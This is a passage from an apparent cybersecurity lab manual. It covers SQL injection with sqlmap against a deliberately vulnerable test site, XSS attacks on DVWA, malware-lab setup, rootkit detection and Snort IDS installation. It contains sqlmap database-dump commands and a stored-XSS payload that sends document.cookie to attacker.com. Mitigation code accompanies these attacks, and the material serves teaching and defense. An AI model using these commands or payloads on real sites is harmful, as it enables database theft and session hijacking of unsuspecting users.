http://testphp.vulnweb.com/listproducts.php?cat=1, where cat=1 is the ‘GET’
parameter, then the website may be vulnerable to this mode of SQL injection, and an
attacker may be able to gain access to information in the database. Furthermore,
SQLMAP works when it is PHP based.

Installing sqlmap

SQLMAP comes pre-installed with kali Linux, which is the preferred choice of
most penetration testers. However, you can install sqlmap on other debian based
linux systems using the command

sudo apt-get install sqlmap

Usage

In this article, we will make use of a website that is designed with vulnerabilities
for demonstration purposes:

http://testphp.vulnweb.com/listproducts.php?cat=1

As you can see, there is a GET request parameter (cat = 1) that can be changed by
the user by modifying the value of cat. So this website might be vulnerable to
SQL injection of this kind.
To test for this, we use SQLMAP. To look at the set of parameters that can be
passed, type in the terminal,

sqlmap -h

The parameters that we will use for the basic SQL Injection are shown in the
above picture. Along with these, we will also use the --dbs and -u parameters, the
usage of which is explained in Step 1.
Using SQLMAP to test a website for SQL Injection vulnerability:

 Step 1: List information about the existing databases

So firstly, we have to enter the web URL that we want to check along with the -u
parameter. We may also use the --tor parameter if we wish to test the website
using proxies. Now typically, we would want to test whether it is possible to
gain access to a database. So we use the --dbs option to do so. --dbs lists all the
available databases.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

 We get the following output showing us that there are two available databases.
Sometimes, the application will tell you that it has identified the database and
ask whether you want to test other database types. You can go ahead and type
‘Y’. Further, it may ask whether you want to test other parameters for
vulnerabilities, type ‘Y’ over here as we want to thoroughly test the web
application.

 We observe that there are two databases, acuart and information_schema.

 Step 2: List information about Tables present in a particular Database
To try and access any of the databases, we have to slightly modify our
command. We now use -D to specify the name of the database that we wish to
access, and once we have access to the database, we would want to see
whether we can access the tables. For this, we use the --tables query. Let us
access the acuart database.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

Tables

 In the above picture, we see that 8 tables have been retrieved. So now we
definitely know that the website is vulnerable.

 Step 3: List information about the columns of a particular table

If we want to view the columns of a particular table, we can use the following
command, in which we use -T to specify the table name, and --columns to
query the column names. We will try to access the table ‘artists’.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists --columns

Columns

 Step 4: Dump the data from the columns

Similarly, we can access the information in a specific column by using the
following command, where -C can be used to specify multiple column names
separated by a comma, and the --dump query retrieves the data.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists -C aname --dump

 From the above picture, we can see that we have accessed the data from the
database. Similarly, in such vulnerable websites, we can literally explore
the databases to extract information.

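The experiment's aim also asks for the measures that prevent the injection, which the sqlmap walkthrough does not show. The following added example (not the vulnweb site's code) rebuilds the listproducts.php?cat=1 pattern against an in-memory SQLite table so the defect and the fix can be run side by side: the vulnerable function pastes the request parameter into the SQL text, so the parameter's content becomes part of the query's structure; the hardened function validates the type and binds the value as a parameter, so the database only ever sees one query shape. The table contents are constructed for the demonstration.

```python
"""listproducts.php?cat=1 rebuilt in Python: vulnerable vs. parameterized.
Added example for Experiment 7; the rows below are constructed sample data."""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, cat INTEGER);
INSERT INTO products (name, cat) VALUES ('poster', 1), ('mug', 1), ('t-shirt', 2);
""")


def list_products_vulnerable(cat):
    """Defect: string concatenation. Whatever the client sends becomes SQL."""
    sql = "SELECT name FROM products WHERE cat = " + cat + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def list_products_bound_only(cat):
    """Binding alone already removes the injection: the database compares the
    whole string as one value, so '1 OR 1=1' matches no row and runs no extra logic."""
    sql = "SELECT name FROM products WHERE cat = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (cat,))]


def list_products_safe(cat):
    """Hardened: reject anything that is not an integer, then bind the value."""
    try:
        cat_id = int(cat)
    except ValueError:
        raise ValueError("cat must be an integer")
    sql = "SELECT name FROM products WHERE cat = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (cat_id,))]


if __name__ == "__main__":
    print(list_products_vulnerable("1"))          # ['poster', 'mug']
    print(list_products_vulnerable("1 OR 1=1"))   # every row: the WHERE clause is now always true
    print(list_products_bound_only("1 OR 1=1"))   # []
    print(list_products_safe("1"))                # ['poster', 'mug']
```

The textbook input "1 OR 1=1" is enough to show the difference: the first function returns the whole table, the second returns nothing, and the third refuses the request before it reaches the database, which is also the point at which a web application should log it.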
9. Implement an XSS attack on a test web application and demonstrate ways to
mitigate such attacks.

Cross-Site Scripting (XSS) Attack Lab Manual

Objective

 Understand how XSS attacks work.
 Perform XSS attacks on a test web application (DVWA).
 Learn how to mitigate XSS attacks.

Lab Setup

1. Tools Required

 Kali Linux (Attacker Machine)
 XAMPP or Docker (To host DVWA)
 DVWA (Damn Vulnerable Web Application) (Target Application)
 Web Browser (Firefox with Burp Suite Extension is recommended)

Step 1: Setting Up the Test Environment

1.1 Install DVWA on Kali Linux

Method 1: Using XAMPP

1. Install XAMPP:

sudo apt update
sudo apt install xampp

2. Start XAMPP:

sudo /opt/lampp/lampp start

3. Download DVWA:

cd /opt/lampp/htdocs/
git clone https://github.com/digininja/DVWA.git

4. Configure DVWA:
o Open config/config.inc.php in a text editor:

nano /opt/lampp/htdocs/DVWA/config/config.inc.php

o Update MySQL settings:

$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = '';

5. Start Apache and MySQL:

sudo /opt/lampp/lampp start

Method 2: Using Docker (Alternative)

docker run --rm -it -p 80:80 vulnerables/web-dvwa

6. Open DVWA in your browser:
URL: http://localhost/DVWA/setup.php
7. Click "Create / Reset Database"
8. Login with:
o Username: admin
o Password: password
9. Set Security Level to Low in the DVWA security settings.

Step 2: Performing XSS Attacks

2.1 Reflected XSS Attack

1. Navigate to the "XSS Reflected" section in DVWA.


2. In the input field, enter the following JavaScript payload:

<script>alert('XSS Attack!');</script>

3. Click Submit.
4. If successful, an alert box should pop up.

💡 Explanation: The input is reflected in the response without validation, allowing
execution of JavaScript.

2.2 Stored XSS Attack

1. Go to the "XSS Stored" section in DVWA.


2. In the comment field, enter:

<script>document.write('<img src="http://attacker.com/steal?cookie='+document.cookie+'">');</script>

3. Click Submit.

4. If successful, the script gets stored in the database and executes for every
visitor, sending cookies to the attacker’s server.

💡 Explanation: The script is saved in the database and executed whenever a user
visits the page.

2.3 DOM-Based XSS Attack

1. Open the XSS DOM section in DVWA.


2. In the URL bar, append the following payload:

http://localhost/DVWA/vulnerabilities/xss_d/?default=<script>alert('XSS')</script>

3. Press Enter.
4. If successful, an alert box will appear.

💡 Explanation: The malicious script is executed by manipulating the DOM.

Step 3: Mitigation Techniques

3.1 Input Validation & Sanitization

 Escape HTML special characters:

htmlspecialchars($input, ENT_QUOTES, 'UTF-8');

 Use parameterized queries in SQL.

3.2 Content Security Policy (CSP)

 Add this to the HTTP headers:

Content-Security-Policy: default-src 'self';

3.3 Use HTTP-Only Cookies

 Prevent cookie theft with:

setcookie("session", "value", ["httponly" => true]);
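An added example (not part of the lab manual) that shows the escaping rule of Step 3.1 and the HttpOnly cookie of Step 3.3 in working JavaScript, runnable with plain Node.js; the function names and the comment-rendering page are hypothetical.

```javascript
// Added example, not from the lab manual: the same five characters that
// PHP's htmlspecialchars($input, ENT_QUOTES, 'UTF-8') escapes, written in
// JavaScript so it runs with plain Node.js. Function names are hypothetical.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#039;',
};

function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable rendering: the comment is concatenated straight into the page,
// which is what the DVWA "XSS Stored" page does at security level Low.
function renderCommentUnsafe(comment) {
  return '<div class="comment">' + comment + '</div>';
}

// Hardened rendering: same markup, but the comment is escaped first, so the
// browser displays the payload as text instead of executing it.
function renderCommentSafe(comment) {
  return '<div class="comment">' + escapeHtml(comment) + '</div>';
}

// Simple check for the lab: does the rendered HTML still contain a <script>
// tag, i.e. did untrusted input reach the page as markup?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Step 3.2: the CSP header from the manual, as a server would emit it.
const CSP_HEADER = ['Content-Security-Policy', "default-src 'self'"];

// Step 3.3: a Set-Cookie value with HttpOnly, so document.cookie cannot
// read the session cookie even if a script does run.
function sessionCookieHeader(value) {
  return `session=${encodeURIComponent(value)}; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed input: the reflected-XSS payload used in Step 2.1.
const PAYLOAD = "<script>alert('XSS Attack!');</script>";

console.log('unsafe:', renderCommentUnsafe(PAYLOAD)); // script tag survives
console.log('safe:  ', renderCommentSafe(PAYLOAD));   // &lt;script&gt; inert text
console.log('cookie:', sessionCookieHeader('abc123'));
```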

EXPERIMENT NO: 10

Aim: Analyze a simple computer virus in a controlled environment and
discuss detection and prevention strategies.
Lab Setup For Malware Analysis
A lab setup for malware analysis typically includes the following components:
1. Virtual Machines: Virtual machines are used to isolate the malware and prevent
it from causing harm to the host system.
2. Analysis Tools: Tools such as antivirus software, sandboxing tools, and
disassemblers are used to analyze the behavior of malware and understand its
functionality.
3. Networking: A virtual network is used to simulate a real-world environment,
allowing the malware to communicate with other systems and allowing the
analyst to observe its behavior.
4. Storage: A large storage device is used to store the malware samples and
analysis data.
5. Monitoring Tools: Monitoring tools such as network sniffers and process
monitors are used to track the behavior of malware and collect data for analysis.
6. Backup System: A backup system is used to ensure that the analysis
environment can be quickly restored if it becomes compromised or unstable.
7. Documentation: Documentation is important for keeping track of the analysis
process and for sharing information with others who may be involved in the
analysis.
It’s important to note that a malware analysis lab must be designed and managed
with security in mind. Access to the lab should be restricted, and all tools and
systems used in the lab should be kept up-to-date and regularly reviewed to ensure
that they are secure.
Threats are one of the most challenging areas in the field of information security,
and the lack of qualified personnel makes it even harder for companies to keep
their information and assets secure and handle such situations without incurring
much loss. Malware analysis is the process of determining the origin, potential
impact, and functionality of a given malware sample such as a virus, trojan horse,
etc. In this article, we are not going to discuss the details of malware or
malware analysis. Rather, we will see how you can effectively set up a lab for
malware analysis. As one plan cannot fit the needs of all organizations, we
need to keep a few alternatives in mind and choose the best one according to your
organization's needs. We will be covering the following topics in this article:

 Why do we need Malware Analysis Lab?
 Brainstorming to build a Malware Analysis Lab.
 Steps for setting up a Malware Analysis Lab.
Let’s get started and discuss each of these topics in detail.

Why do we need Malware Analysis Lab?

Malware Analysis Lab can help you in any of the following ways:
 It will increase your analysis speed.
 A suitable environment will build a framework and identify TTP and IOC.
 A malware analysis lab will help you to get control of what gets in and out of
the network.
 It will decrease the risk of infection.

Brainstorming to Build a Malware Analysis Lab

The first and most important thing to do before setting up a lab is to figure out
the needs and requirements for it. It is very important to have some dedicated
systems with tools to control, analyze, and safeguard your environment. Here are
some of the questions you need to answer to have a clear understanding of what
you need in your lab.
 What tools do you need? There are a lot of tools available in the market for
each task associated with malware analysis, but you need to try a bunch of them
and determine which tools are best suited to your needs.
 What type of operating systems do you need? There are a variety of systems
available, like Windows, Linux, OS X, or even mobile OSes like Android and iOS.
It is advisable to get started with Windows and Linux first and then get your
hands on other operating systems.
 What do you want to achieve? You should have a clear understanding of your
motive for setting up the lab and be clear about what you want to achieve through it.

Steps for setting up Malware Analysis Lab

To set up the Malware Analysis Lab, follow the points mentioned below.
1. Network: One of the most important and first steps in setting up a lab is to
define its network. Here are a few reasons why this step is important:
 You need to have information about your network to identify uncommon
patterns and uncommon connection attempts.
 You need to know about what is going in and what is going out of the network.

 You need to intercept traffic between your Analysis system and the Network.
 You need to isolate the analysis system from other computers.
Choose your favorite private network address space and assign static IP
addresses to each one of your systems. The reason for this allotment is that once
you start collecting network information, you will spend most of your time
trying to figure out which system a given address belonged to if you don't keep a list.
You're also going to need a dedicated machine to control your network traffic and
to act as a gateway for your lab. REMnux and Kali are two options that you can
consider for your gateway.
2. Virtualization: Virtualization software is required in either of the following
scenarios:
 When you don’t have a few spare machines, a switch, and a dedicated physical
space for this.
 You simply want to carry your Lab with you whenever you go.
There are a few options for virtualization software, like VMware, QEMU, VirtualBox
(free), and if you don't mind spending a few bucks you can go for VMware
Workstation. Virtualization software will allow you to host your entire lab on a
single machine, and it provides another interesting feature: snapshots.
Snapshots allow you to revert your machines to a clean state, so you can start an
analysis over and over again. They are quite useful for keeping track of your work
on long analyses. If you are using virtualization software, how you set up your
virtual network is very important. You have three options for this:
 Bridged: Do not use Bridged mode; this can expose your network to threats,
and you don't want to infect anybody else's systems.
 NAT: This is the ideal choice. Disable DHCP so you can stick to your design.
 Host-Only: Host-Only only lets your virtual systems communicate with your
host machine; you don't want this either.
3. Analysis Machines: If you are going to do malware analysis, then you will
need a variety of systems to run your samples, execute your tools, and do static
and dynamic analysis. Follow these simple steps to set up each one of the
systems that you choose.
 Install the operating system and install the security updates.
 Install Virtual Machine Tools (optional).
 Install analysis tools; for Windows, you can check the FLARE VM tools to
automate some of these tasks.
 Set up the network configuration.
 Save a snapshot in a clean state.

These simple five steps will help you to get a checklist and set up the machines
you’ll need to move forward on your analysis. Operating systems can be selected
from the following list:
 Windows 10
 Windows 7
 Linux (Ubuntu Server 16.04)
 REMnux
 Kali Linux
 Metasploitable 2
 Metasploitable 3
 Virtual Machine with OS X
 Android
4. Testing your Environment: Before starting with the analysis, you need to
make sure that everything is perfect and working fine. For this you need to check
the following things:
 Make sure no analysis machine has access to the Internet or your home/ work
network. You can control this with a Gateway. Try turning it ON and OFF so
that you can get familiar with the process.
 Turn all your machines ON and try running a network scan to see that
everything is working properly.
 It is very important to make sure that all your machines have a snapshot in a
clean state. You should have clear rules and definitions stating how often you
will update them to install security patches, new software versions, and other
changes.

EXPERIMENT NO: 11

Aim: Investigate the functioning of a rootkit and demonstrate techniques to
detect it.

A rootkit is malicious software that allows an unauthorized user to gain access to a
system and to its restricted software. Rootkits may contain keyloggers,
credential stealers, etc.

Most of the instructors focus on the hacking part rather than providing knowledge
on security. Rootkits with bad intentions can affect our system or privacy.

A rootkit is the combination of two words — "root" and "kit" — where root refers to
the administrative account with full privileges on the system, and kit refers to
the code/program that allows the attacker to obtain unauthorized access.

In Kali Linux, we can install various open-source software to protect our PCs from
rootkits. "chkrootkit" and "rkhunter" are the two most well-known open-source
tools that anyone can install on their Linux system for the detection of
rootkits.

Chkrootkit

Chkrootkit (check rootkit) is a very old UNIX-based rootkit detection program
which lets users check their system for rootkits.

To install chkrootkit on your system,
$ sudo apt-get install chkrootkit

After installing any tool on your PC, the best thing to do first is to check the help
section. Users get to know its various functions with this,
$ chkrootkit -h

So, the simplest way of running chkrootkit is by typing,
$ chkrootkit

The process begins and it starts checking the third-party programs in particular.
This lists each program scanned along with its status.

For those using Kali Linux, "chkrootkit" is pre-installed.

Rkhunter

Rkhunter (Rootkit Hunter) is a Linux/Unix based tool to scan for possible rootkits,
backdoors and local exploits.

It does this by comparing SHA-1 hashes of important files with known good ones
in online databases, searching for default directories (of rootkits), wrong
permissions, hidden files, suspicious strings in kernel modules, and special tests for
Linux. (Wikipedia)

My personal favourite is "rkhunter" because of its additional functionality, and
also because other tools like chkrootkit are old tools, so there are many known exploits
for them.

To install rkhunter on Linux,
$ sudo apt-get install rkhunter

Now, by default, typing rkhunter into the terminal will show you the list of
options you can go through.
So, the most common option to check the system for rootkits is -c (--check):
$ rkhunter -c

So, it will go through all the system files as well as third party programs in order to
look for the rootkits.

This will provide you with the summary of files scanned.

Finally, the result of the summary will be written into the log file →
/var/log/rkhunter.log

EXPERIMENT NO: 12

Aim: Set up a basic IDS like Snort and test its effectiveness in detecting
different types of attacks.
This will ensure that you have access to the latest version of Snort in the
repository.

Step 3: Install Snort using the following command:

sudo apt-get install snort


This command will download and install Snort on your system.

After Installing Snort, let's configure it.

Step 4: Once the installation is complete, you can check the version of
Snort installed on your system by running the following command:

snort -V
This will display the version information of Snort.

Step 5: By default, Snort will not start automatically when you boot up your
system.

You can enable Snort to start automatically on system boot by running the
following command:

sudo systemctl enable snort.service


This will enable Snort to start automatically every time you boot up your
system.

That's it! You now have Snort installed and enabled on your Linux system.

The steps below are the same for both methods.

Step 4: Create Snort User and Group

For security purposes, it is recommended to create a dedicated user and
group for Snort. Run the following commands to create a Snort user and
group:

sudo groupadd snort


sudo useradd snort -r -s /sbin/nologin -c SNORT_IDS -g snort
Step 5: Create Directories for Snort

Create the necessary directories for Snort by running the following
commands:

sudo mkdir /etc/snort


sudo mkdir /etc/snort/rules
sudo mkdir /etc/snort/preproc_rules
sudo mkdir /usr/local/lib/snort_dynamicrules
sudo mkdir /etc/snort/so_rules
Step 6: Configure Snort

After installing Snort, the next step is to configure it. We need to copy the
configuration files from the Snort directory to the /etc/snort directory. To do
this, run the following command:

sudo cp *.conf* /etc/snort


This command will copy all configuration files with .conf extension to
the /etc/snort directory.

Now, we need to edit the snort.conf file located in the /etc/snort directory.
This file contains the configuration options for Snort. You can use any text
editor to edit this file.

The snort.conf file contains many options, and it can be overwhelming for
beginners. However, you only need to modify a few options to get started.
Here's an example configuration:

ipvar HOME_NET 192.168.1.0/24


ipvar EXTERNAL_NET any

var RULE_PATH /etc/snort/rules


var SO_RULE_PATH /etc/snort/so_rules
var PREPROC_RULE_PATH /etc/snort/preproc_rules
var WHITE_LIST_PATH /etc/snort/rules
var BLACK_LIST_PATH /etc/snort/rules

output unified2: filename snort


In the above configuration, we have defined:

 HOME_NET as 192.168.1.0/24, which is the network we want to protect.
 EXTERNAL_NET as any, which means any external network.
 RULE_PATH, SO_RULE_PATH and PREPROC_RULE_PATH, which specify the paths for
the rule files. By default, Snort looks for the rule files in these directories.
 WHITE_LIST_PATH and BLACK_LIST_PATH, which specify the paths for the
whitelist and blacklist.

Finally, we have specified the output format as unified2 and the filename
as snort. This will generate alerts in the unified2 format and store them
in the snort file.

You can modify these options according to your requirements. Once you
have edited the snort.conf file, save it and exit the editor.

Step 7: Test Snort Installation

Now, it's time to test our Snort installation to make sure it's working
properly. Run the following command to start Snort in test mode:

sudo snort -T -c /etc/snort/snort.conf


This command will test the configuration file and display any errors or
warnings. If everything is fine, it will display a message saying Snort
successfully validated the configuration!.

Step 8: Start Snort

After successfully testing Snort, we can start it in the background using the
following command:

sudo snort -q -u snort -g snort -c /etc/snort/snort.conf -i eth0


This command will start Snort in daemon mode with the eth0 interface. You
can replace eth0 with your desired interface name.

Congratulations! You have successfully installed Snort on your Linux
system. You can now start monitoring your network traffic for any potential
security threats.
